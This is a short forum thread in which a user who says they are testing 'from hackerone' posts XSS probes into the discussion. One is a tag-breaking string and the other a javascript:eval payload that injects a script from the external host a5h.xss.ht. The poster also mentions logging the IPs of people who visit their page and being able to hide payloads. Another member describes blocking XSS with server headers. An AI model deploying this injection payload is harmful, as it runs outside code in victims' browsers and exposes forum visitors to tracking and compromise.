testing from hackerone
1 Like
">
javascript:eval(‘var a=document.createElement('script');a.src='https://a5h.xss.ht';document.body.appendChild(a)’)
1 Like
">
Nice; did you find any vulnerabilities?
still no but i can get ip who visit my page are you from status.im?
Yeah, I’m tidus.eth on Status.
got it nice to meet you
1 Like
yes iam checking i can hide any payload to do something
1 Like
I generally block XSS by injecting headers through my Web server across everything I host (Caddy makes this super easy), then relaxing them per subdomain as needed or if I see errors in the console for whatever.
cool okay i will try other vulnerability test
1 Like
Best of luck! Thanks for the white hat work.
thanks for chat chris i try my best
2 Likes
welcome :)))))))))))))